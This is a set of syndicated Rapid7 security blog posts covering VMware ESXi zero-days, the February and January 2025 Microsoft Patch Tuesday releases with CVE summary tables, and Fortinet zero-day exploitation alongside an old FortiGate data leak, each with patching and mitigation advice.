Post Syndicated from Stephen Fewer original https://blog.rapid7.com/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/

Multiple zero-day vulnerabilities in Broadcom VMware ESXi and other products

On Tuesday, March 4, 2025, Broadcom published a critical security advisory (VMSA-2025-0004) on 3 new zero-day vulnerabilities affecting multiple VMware products, including ESXi, Workstation, and Fusion. The most severe of the vulnerabilities is CVE-2025-22224, a critical vulnerability in ESXi and Workstation. Notably, these are not remotely exploitable vulnerabilities — they require an attacker to have existing privileged access on a VM that is running on an affected VMware hypervisor.

CVE-2025-22224 (CVSS 9.3): A Time-of-Check Time-of-Use (TOCTOU) vulnerability in VMware ESXi and Workstation that can lead to an out-of-bounds write condition. An attacker with local administrative privileges on a virtual machine could exploit this issue to execute code as the virtual machine’s VMX process running on the host.
CVE-2025-22225 (CVSS 8.2): An arbitrary write vulnerability in VMware ESXi that allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.
CVE-2025-22226 (CVSS 7.1): An information disclosure vulnerability in VMware ESXi, Workstation, and Fusion that arises from an out-of-bounds read in the Host Guest File System (HGFS). An attacker with administrative privileges to a virtual machine could exploit this issue to leak memory from the VMX process.

Broadcom has published an FAQ with additional information for VMware customers.

All 3 vulnerabilities were reported to Broadcom by Microsoft Threat Intelligence Center. Broadcom’s advisory indicates for all 3 CVEs that Broadcom “has information to suggest that exploitation has occurred in the wild.” Shortly after Broadcom published their advisory, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added all 3 CVEs to the Known Exploited Vulnerabilities (KEV) list.

Based on the information in the advisory, it appears that the 3 vulnerabilities can be chained together: “This is a situation where an attacker who has already compromised a virtual machine’s guest OS and gained privileged access (administrator or root) could move into the hypervisor itself.”

There is no known public exploit code for any of the CVEs at time of publication. Nevertheless, given that ESXi hypervisors are popular targets for both financially motivated and state-sponsored adversaries, Rapid7 recommends applying vendor-supplied fixes on an expedited basis.

Affected products

The following products are vulnerable to CVE-2025-2224, CVE-2025-22225, and CVE-2025-2226:

Broadcom VMware ESXi 7.0 and 8.0
Broadcom VMware Cloud Foundation 4.5.x and 5.x
Broadcom VMware Telco Cloud Platform 5.x, 4.x, 3.x, and 2.x
Broadcom VMware Telco Cloud Infrastructure 3.x and 2.x

The following products are vulnerable to CVE-2025-22224 and CVE-2025-22226:

Broadcom VMware Workstation 17.x

The following product is vulnerable to CVE-2025-22226:

Broadcom VMware Fusion 13.x

For the most complete information on affected and fixed versions, see Broadcom’s advisory and FAQ.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226 on Broadcom VMware ESXi hypervisors, Fusion, and Workstation products with vulnerability checks expected to be available in today’s (Tuesday, March 4) content release.

Patch Tuesday – February 2025

2025-02-11 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/02/11/microsoft-patch-tuesday/

Patch Tuesday - February 2025

Microsoft is addressing 56 vulnerabilities this February 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation for two of the vulnerabilities published today, which is reflected in CISA KEV. Microsoft is aware of public disclosure for two other vulnerabilities. This is now the fifth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today also sees the publication of just three critical remote code execution (RCE) vulnerabilities. Eleven browser vulnerabilities have already been published separately this month, and are not included in the total.

Ancillary Function Driver: zero-day EoP

All versions of Windows receive patches today for CVE-2025-21418, a heap-based buffer overflow in the Windows Ancillary Function Driver (AFD). Successful exploitation leads to SYSTEM privileges. The AFD has been around for decades; it handles foundational networking functionality, so it is necessarily a kernel driver which interacts with a great deal of user-supplied input. It is perhaps not very shocking that AFD has been the site of a significant number of problems over the years: specifically, elevation of privilege (EoP) vulnerabilities. Microsoft is aware of existing exploitation in the wild, and with low attack complexity, low privilege requirements, and no requirement for user interaction, CVE-2025-21418 is one to prioritize for patching. The relatively low CVSSv3 base score of 7.8 and severity rating of Important may appear relatively mild; however, broad similarities exist between this vuln and CVE-2024-38193, which Rapid7 flagged as ripe for malware abuse on the day it was published, and which has subsequently been linked to exploitation by North Korean state-associated threat actor tracked as Lazarus.

Windows Storage: zero-day EoP

Ever wanted to delete a file on a Windows box, but pesky permissions prevented you from achieving your goal? CVE-2025-21391 might be just what you need: an elevation of privilege (EoP) vulnerability in the Windows Storage service for which Microsoft is aware of exploitation in the wild. No user interaction is required, and attack complexity is low, and the weakness is given as “CWE-59: Improper Link Resolution Before File Access” but what are attackers hoping to achieve here? Although the advisory provides scant detail, and even offers some vague reassurance that “an attacker would only be able to delete targeted files on a system”, it would be a mistake to assume that the impact of deleting arbitrary files would be limited to data loss or denial of service. As long ago as 2022, ZDI researchers set out how a motivated attacker could parlay arbitrary file deletion into full SYSTEM access using techniques which also involve creative misuse of symbolic links.

NTLMv2 disclosure: zero-day spoofing

It’s almost surprising when any particular Patch Tuesday doesn’t involve plugging one or two holes through which NTLM hashes can leak. CVE-2025-21377 describes an NTLMv2 hash disclosure vulnerability where exploitation ultimately results in the attacker gaining the ability to authenticate as the targeted user. Minimal user interaction with a malicious file is required, including selecting, inspecting, or “performing an action other than opening or executing the file.” This trademark linguistic ducking and weaving may be Microsoft’s way of saying “if we told you any more, we’d give the game away.” Accordingly, Microsoft assesses exploitation as more likely. The advisory acknowledges researchers from 0patch by ACROS Security — who also reported last month’s NTLM hash disclosure zero-day vuln CVE-2025-21308 — as well as others from Securify and Cathay Pacific; this might be the first instance of an airline receiving credit for reporting a Microsoft zero-day vulnerability.

Surface: zero-day container escape

A wide array of Microsoft Surface machines are vulnerable to CVE-2025-21194 until patched, although the most recent Surface Pro 10 and 11 series are not listed as vulnerable. The vulnerability is described as a security feature bypass, and exploitation could lead to container escape from a UEFI host machine and compromise of the hypervisor. Surface devices receive updates via Windows Update, although the advisory also gives brief instructions for users who wish to apply the updates manually. Microsoft describes the vulnerability as publicly disclosed.

LDAP server: critical RCE

Any security advisory which lists multiple weakness types typically describes a complex vulnerability, and Windows LDAP critical remote code execution (RCE) CVE-2025-21376 is no exception. Successful exploitation requires an attacker to navigate multiple challenges, including winning a race condition. The prize: code execution on the Windows LDAP server. Although Microsoft seldom specifies the privilege level of code execution on LDAP server vulnerabilities, Rapid7 has noted previously that the LDAP service runs in a SYSTEM context, and that is the only safe assumption. All versions of Windows receive a patch.

DHCP client: critical RCE

Today sees the publication of a slightly mysterious critical RCE in the Windows DHCP Client Service. Exploitation of CVE-2025-21379 requires an attacker to intercept and potentially modify communications between the Windows DHCP client and the requested resource, which implies either that an attacker can break encryption, or that no encryption is present in the DHCP communication; this risk is highlighted in Microsoft’s own spec for DHCP implementation.

Excel: critical RCE

As if spreadsheets weren’t dangerous enough by themselves, today sees publication of CVE-2025-21381, a critical RCE in Excel. As usual for this class of attack, the advisory clarifies that “remote” in this case refers to the location of the attacker, since user interaction is required, and the code execution will be in the context of the user on their local machine. The Outlook Preview Pane is an attack vector, so simply glancing at an email containing a specially crafted malicious spreadsheet is enough for the attack to succeed, although an attacker could also convince a user to download and open a file from a website, or perhaps simply drop a few USB sticks in the parking lot.

Microsoft lifecycle update

In Microsoft product lifecycle news, SQL Server 2019 moves from mainstream support to extended support on 2025-02-28.

Summary charts

Summary tables

Apps vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21322	Microsoft PC Manager Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21259	Microsoft Outlook Spoofing Vulnerability	No	No	5.3

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21198	Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability	No	No	9
CVE-2025-21188	Azure Network Watcher VM Extension Elevation of Privilege Vulnerability	No	No	6

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21342	Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21408	Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21279	Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability	No	No	6.5
CVE-2025-21283	Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability	No	No	6.5
CVE-2025-21253	Microsoft Edge for IOS and Android Spoofing Vulnerability	No	No	5.3
CVE-2025-21267	Microsoft Edge (Chromium-based) Spoofing Vulnerability	No	No	4.4
CVE-2025-21404	Microsoft Edge (Chromium-based) Spoofing Vulnerability	No	No	4.3
CVE-2025-0451	Chromium: CVE-2025-0451 Inappropriate implementation in Extensions API	No	No	N/A
CVE-2025-0445	Chromium: CVE-2025-0445 Use after free in V8	No	No	N/A
CVE-2025-0444	Chromium: CVE-2025-0444 Use after free in Skia	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21206	Visual Studio Installer Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-24042	Visual Studio Code JS Debug Extension Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-24039	Visual Studio Code Elevation of Privilege Vulnerability	No	No	7.3

Developer Tools Mariner vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2023-32002	HackerOne: CVE-2023-32002 Node.js `Module._load()` policy Remote Code Execution Vulnerability	No	No	N/A

Device vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21194	Microsoft Surface Security Feature Bypass Vulnerability	No	Yes	7.1

ESU Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21406	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21407	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21190	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21200	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21371	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21201	Windows Telephony Server Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21208	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21410	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21368	Microsoft Digest Authentication Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21369	Microsoft Digest Authentication Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21376	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21359	Windows Kernel Security Feature Bypass Vulnerability	No	No	7.8
CVE-2025-21373	Windows Installer Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21420	Windows Disk Cleanup Tool Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21418	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-21375	Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21181	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21419	Windows Setup Files Cleanup Elevation of Privilege Vulnerability	No	No	7.1
CVE-2025-21377	NTLM Hash Disclosure Spoofing Vulnerability	No	Yes	6.5
CVE-2025-21352	Internet Connection Sharing (ICS) Denial of Service Vulnerability	No	No	6.5
CVE-2025-21347	Windows Deployment Services Denial of Service Vulnerability	No	No	6
CVE-2025-21350	Windows Kerberos Denial of Service Vulnerability	No	No	5.9
CVE-2025-21337	Windows NTFS Elevation of Privilege Vulnerability	No	No	3.3

Microsoft Dynamics vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21177	Microsoft Dynamics 365 Sales Elevation of Privilege Vulnerability	No	No	8.7

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21400	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	8
CVE-2025-21392	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21397	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21381	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21386	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21387	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21390	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21394	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-21383	Microsoft Excel Information Disclosure Vulnerability	No	No	7.8
CVE-2025-24036	Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability	No	No	7

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21367	Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21358	Windows Core Messaging Elevation of Privileges Vulnerability	No	No	7.8
CVE-2025-21351	Windows Active Directory Domain Services API Denial of Service Vulnerability	No	No	7.5
CVE-2025-21182	Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability	No	No	7.4
CVE-2025-21183	Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability	No	No	7.4
CVE-2025-21391	Windows Storage Elevation of Privilege Vulnerability	Yes	No	7.1
CVE-2025-21379	DHCP Client Service Remote Code Execution Vulnerability	No	No	7.1
CVE-2025-21184	Windows Core Messaging Elevation of Privileges Vulnerability	No	No	7
CVE-2025-21414	Windows Core Messaging Elevation of Privileges Vulnerability	No	No	7
CVE-2025-21349	Windows Remote Desktop Configuration Service Tampering Vulnerability	No	No	6.8
CVE-2025-21212	Internet Connection Sharing (ICS) Denial of Service Vulnerability	No	No	6.5
CVE-2025-21216	Internet Connection Sharing (ICS) Denial of Service Vulnerability	No	No	6.5
CVE-2025-21254	Internet Connection Sharing (ICS) Denial of Service Vulnerability	No	No	6.5
CVE-2025-21179	DHCP Client Service Denial of Service Vulnerability	No	No	4.8

Fortinet firewalls hit with new zero-day attack, older data leak

2025-01-16 Caitlin Condon

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/01/16/etr-fortinet-firewalls-hit-with-new-zero-day-attack-older-data-leak/

Executive summary

Fortinet firewalls hit with new zero-day attack, older data leak

Rapid7 is investigating two separate events affecting Fortinet firewall customers:

Zero-day exploitation of CVE-2024-55591, an authentication bypass vulnerability in FortiOS and FortiProxy disclosed earlier this week. Successful exploitation could allow remote attackers to gain super-admin privileges via crafted requests to the Node.js websocket module.
A January 15, 2025 dark web post from a threat actor who looks to have published IPs, passwords, and configuration data from 15,000 FortiGate firewalls. The data leaked online appears to be several years old (2022). Rapid7 has not attributed any CVEs to the leaked data at this time.

FortiGate data leak

On Wednesday, January 15, 2025, a threat actor named “Belsen Group” published a trove of Fortinet FortiGate firewall data on the dark web, allegedly from 15,000 organizations. The data released included IP addresses, passwords, and firewall configuration information — a potentially significant risk for organizations whose data was leaked.

Security researcher Kevin Beaumont has an initial analysis of the leaked data, along with his assessment that the data leaked this week appears to be from 2022. After conducting our own outreach to potentially affected organizations, Rapid7 has also confirmed that at least some of the leaked data originated from 2022 incidents where customer firewalls were compromised. Based on Beaumont’s analysis and observations from our own investigations, it’s likely that the data dump published by the threat actor contains primarily or entirely older data.

Rapid7 has not attributed the data leak to a specific CVE at this time. Beaumont said his observations from incident responses indicate that CVE-2022-40684 (a Fortinet firewall zero-day flaw from 2022) may have been the initial access vector that allowed for the large-scale firewall data leak.

New Fortinet zero-day CVE also exploited in the wild

Separately, on Tuesday, January 14, 2025, Fortinet disclosed CVE-2024-55591, a new zero-day vulnerability affecting FortiOS and FortiProxy. Security firm Arctic Wolf had previously published a blog on threat activity targeting Fortinet firewall management interfaces exposed to the public internet, saying that “a zero-day vulnerability is likely” but an initial access vector had not been confirmed. According to Arctic Wolf, the campaign “involved unauthorized administrative logins on management interfaces of firewalls, creation of new accounts, SSL VPN authentication through those accounts, and various other configuration changes.”

Fortinet’s advisory for CVE-2024-55591 includes indicators of compromise (IOCs) and notes that the vulnerability was reported as exploited in the wild at time of disclosure. No individual or firm is explicitly credited for discovering the vulnerability in Fortinet’s advisory, and Fortinet has not confirmed that CVE-2024-55591 is the zero-day vulnerability Arctic Wolf speculated was being leveraged threat activity.

Rapid7 MDR threat hunters have observed activity from IP addresses publicly attributed to the threat campaign targeting CVE-2024-55591, but our team has so far only noted connections consistent with scanning or reconnaissance activity and not exploitation.

Zero-day vulnerabilities in Fortinet FortiOS, the operating system that runs on FortiGate firewalls, have been a relatively common occurrence in recent years and have been leveraged in a wide range of financially motivated, state-sponsored, and other attacks. In addition to CVE-2024-55591, prominent FortiOS zero-day flaws have included:

CVE-2024-21762, an out-of-bounds write disclosed February 2024
CVE-2023-27997, a heap-based buffer overflow disclosed June 2023
CVE-2022-42475, a heap-based buffer overflow disclosed December 2022
CVE-2022-40684, an authentication bypass (CWE-288) disclosed October 2022
CVE-2018-13379, while not a zero-day, was disclosed in 2019 and allowed attackers to download SSL-VPN system files and steal credentials. It was consistently exploited in the years following disclosure despite a wide range of warnings and publicly available information on known threat activity.

Like CVE-2022-40684, CVE-2024-55591 is an authentication bypass using an alternate path or channel (CWE-288). While it does not currently appear likely that CVE-2024-55591 is the vulnerability that enabled the collection and release of FortiGate firewall configuration data on January 15, 2025, the vulnerability is nevertheless being exploited in the wild and should be treated with urgency.

Mitigation guidance

According to Fortinet’s advisory, the following products and versions are vulnerable to CVE-2024-55591:

Fortinet FortiOS 7.0.0 through 7.0.16 (fixed in 7.0.17 or above)
Fortinet FortiProxy 7.2.0 through 7.2.12 (fixed in 7.2.13 or above)
Fortinet FortiProxy 7.0.0 through 7.0.19 (fixed in 7.0.20 or above)

Per Fortinet, other versions of FortiOS (6.4, 7.2, 7.4, 7.6) and FortiProxy (2.0, 7.4, 7.6) are not affected. Customers should update to a fixed version immediately, without waiting for a regular patch cycle to occur, and review Fortinet’s IOCs to aid investigations into suspicious activity. Indicators include examples of administrative or local users added by adversaries.

Customers should also ensure that firewall management interfaces are not exposed to the public internet and limit IP addresses that can reach administrative interfaces. If your organization was impacted by the January 15, 2025 FortiGate firewall data leak, you should change administrative and local user passwords immediately. FortiOS also supports multi-factor authentication (MFA) for local user accounts, which Rapid7 strongly recommends implementing.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2024-55591 with vulnerability checks available in the January 15, 2025 content release. Customers already have coverage for all other FortiOS vulnerabilities mentioned in this blog from past content releases.

Patch Tuesday – January 2025

2025-01-15 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/01/14/patch-tuesday-january-2025/

Patch Tuesday - January 2025

Microsoft is addressing 161 vulnerabilities this January 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation and/or public disclosure for eight of the vulnerabilities published today, with three listed on CISA KEV. This is now the fourth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today also sees the publication of nine critical remote code execution (RCE) vulnerabilities. Unusually, Microsoft has not yet published any browser vulnerabilities this month.

Access: triple zero-day RCE

Today sees the publication of three very similar zero-day Microsoft Access vulnerabilities: CVE-2025-21366, CVE-2025-21395, and CVE-2025-21186. In each case, Microsoft notes public disclosure, but does not claim evidence of exploitation in the wild. Successful exploitation leads to code execution via heap-based buffer overflow, and requires that an attacker convince the user to download and open a malicious file.

Curiously, in each case, one portion of the advisory FAQ describes the update protection as “blocking potentially malicious extensions from being sent in an email”, but the remainder of the advisory doesn’t clarify how this would prevent malicious activity. Typically, patches provide protection by blocking malicious files upon receipt of a malicious email attachment, rather than preventing a malicious attachment from being sent in the first place, since an attacker is free to send whatever they like from any system they control.

The FAQ does mention that users who would otherwise have interacted with a malicious attachment will instead receive a notification that there was an attachment but “it cannot be accessed”, which is perhaps the best play on words we’ve seen from MSRC in a while.

Hyper-V NT Kernel Integration VSP: triple zero-day EoP

Microsoft is addressing a trio of related Windows Hyper-V NT Kernel Integration VSP elevation of privilege vulnerabilities today: CVE-2025-21333, CVE-2025-21334, and CVE-2025-21335. Microsoft is aware of exploitation in the wild for all three, as seen on both the Microsoft advisories and CISA KEV. In each case, exploitation leads to SYSTEM privileges. The advisories are short on additional detail, beyond a brief acknowledgement of Anonymous — presumably an undisclosed party, rather than the hacktivist collective — on CVE-2025-21333.

While we can sometimes infer context from prior examples, in this case there aren’t any; there is no mention of Hyper-V NT Kernel Integration VSP in any vulnerability published by Microsoft, at least as far back as 2017. If we look back five years, CVE-2020-16885 does describe an elevation of privilege vulnerability in the Windows storage VSP driver, but there isn’t a lot to go on there either.

The Virtualization Service Provider (VSP) resides in the root partition of a Hyper-V instance, and provides synthetic device support to child partitions over the Virtual Machine Bus (VMBus): it’s the foundation of how Hyper-V allows the child partition to trick itself into thinking that it’s a real computer. Given that the entire thing is a security boundary, it’s perhaps surprising that no Hyper-V NT Kernel Integration VSP vulnerabilities have been acknowledged by Microsoft until today, but it won’t be at all shocking if more now emerge.

The advisories published today do not clarify whether the elevation of privilege is only to SYSTEM within the child partition, but container escape specialists will surely be hunting for exploits in this area.

Windows Themes: zero-day NTLM disclosure

Many enterprise users or even admins may not think about Windows Themes very often, but consider CVE-2025-21308: a spoofing vulnerability where successful exploitation leads to improper disclosure of an NTLM hash, which allows an attacker to impersonate the user from whom it was acquired. Microsoft does not have evidence of in-the-wild exploitation, but does note public disclosure.

The advisory FAQ dances around the exploitation methodology without explaining; what we learn is that once an attacker had somehow delivered a malicious file to the target system, a user would need to manipulate the malicious file, but not necessarily click or open it. Without further detail, we can only speculate, but it’s plausible that simply opening a folder containing the file in Windows Explorer — including the Downloads folder — or inserting a USB drive, would be enough to trigger the vulnerability and see your NTLM hash leak silently for collection by the threat actor.

Some good news: Microsoft has removed NTLMv1 support from Windows 11 24H2 and Server 2025 onwards. Less good: it has been a whole two months since Microsoft last patched a zero-day NTLM disclosure vulnerability; that flaw was within MSHTML/Trident, and Windows 11 24H2 and Server 2025 were still vulnerable, since NTLMv2 is still supported across the board.

On the advisory for CVE-2025-21308, Microsoft does link to documents describing a mitigation technique: restricting NTLM traffic. This is certainly worth a look, since a representative of reporting research organization 0patch has confirmed that NTLMv2 is affected by CVE-2025-21308.

Windows Installer: zero-day EoP

Installing or updating software often requires elevated privileges, and researchers and threat actors have known this for a long time. The advisory for CVE-2025-21275 doesn’t weigh us down with lengthy explanations, it simply says that successful exploitation leads to SYSTEM privileges. Microsoft is aware of public disclosure of this vulnerability, but not in-the-wild exploitation.

CVE-2025-21275 is the latest in a long line of Windows Installer elevation of privilege vulnerabilities; Microsoft has now published 37 Windows Installer elevation of privilege vulnerabilities in total since the start of 2020, although only five of those have been zero-days, with only CVE-2024-38014 known by Microsoft to have been exploited prior to publication in September 2024.

PGM: critical RCE

Microsoft’s in-house research teams are a reliable source of vulnerability discovery in Microsoft products, and today we get patches for the self-discovered CVE-2025-21307, a critical RCE in the Windows Reliable Multicast Transport Driver (RMCAST) with a CVSSv3 base score of 9.8. The vulnerability is only exploitable on a system where a program is listening on a Pragmatic General Multicast (PGM) port.

In 2025, you might very well expect that any service that a major commercial operating system exposes to the network would provide at least some form of authentication capability, but if so, prepare to be disappointed by the Windows implementation of PGM. The concept was first described in RFC 3208, which was published in 2001 in an Experimental state and stayed that way. As Microsoft themselves put it, “the PGM specification [RFC3208] is ambiguous in a number of areas”.

Given the lack of required user interaction and remote attack vector for CVE-2025-21307, it’s well worth asking yourself: does our firewall allow a PGM receiver to receive inbound traffic from the public internet? If so, the second-best time to prevent that is right now.

OLE: critical RCE

Outlook admins who force their users to read emails in plain text only can skip this paragraph, but everyone else should be aware of CVE-2025-21298, a Windows Object Linking and Embedding (OLE) critical RCE with a CVSSv3 base score of 9.8. The eternal threat of the malicious inbound email finds expression again here; just previewing the wrong email in Outlook is all it takes for an attacker to achieve code execution in the context of the user. All versions of Windows receive a patch.

Microsoft lifecycle update

In Microsoft product lifecycle news, Visual Studio 2022 17.6 LTSC receives its last update today.

Summary Charts

Summary tables

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21380	Azure Marketplace SaaS Resources Information Disclosure Vulnerability	No	No	8.8
CVE-2025-21403	On-Premises Data Gateway Information Disclosure Vulnerability	No	No	6.4

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21178	Visual Studio Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21176	.NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21172	.NET and Visual Studio Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-21171	.NET Remote Code Execution Vulnerability	No	No	7.5
CVE-2024-50338	GitHub: CVE-2024-50338 Malformed URL allows information disclosure through git-credential-manager	No	No	7.4
CVE-2025-21405	Visual Studio Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-21173	.NET Elevation of Privilege Vulnerability	No	No	7.3

ESU Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-21307	Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability	No	No	9.8
CVE-2025-21298	Windows OLE Remote Code Execution Vulnerability	No	No	9.8
CVE-2025-21411	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21413	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21233	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21236	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21237	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21243	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21244	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21252	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21266	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21282	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21302	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21303	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21306	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21273	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21286	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21305	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21339	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21246	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21417	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21250	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21240	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21238	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21223	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21409	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21245	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21293	Active Directory Domain Services Elevation of Privilege Vulnerability	No	No	8.8
CVE-2025-21297	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21309	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21295	SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21294	Microsoft Digest Authentication Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21287	Windows Installer Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21378	Windows CSC Service Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21281	Microsoft COM for Windows Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-21389	Windows upnphost.dll Denial of Service Vulnerability	No	No	7.5
CVE-2025-21300	Windows upnphost.dll Denial of Service Vulnerability	No	No	7.5
CVE-2025-21276	Windows MapUrlToZone Denial of Service Vulnerability	No	No	7.5
CVE-2025-21218	Windows Kerberos Denial of Service Vulnerability	No	No	7.5
CVE-2025-21220	Microsoft Message Queuing Information Disclosure Vulnerability	No	No	7.5
CVE-2025-21251	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21270	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21277	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21285	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21289	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21290	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21230	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-21231	IP Helper Denial of Service Vulnerability	No	No	7.5
CVE-2025-21296	BranchCache Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-21331	Windows Installer Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-21211	Secure Boot Security Feature Bypass Vulnerability	No	No	6.8
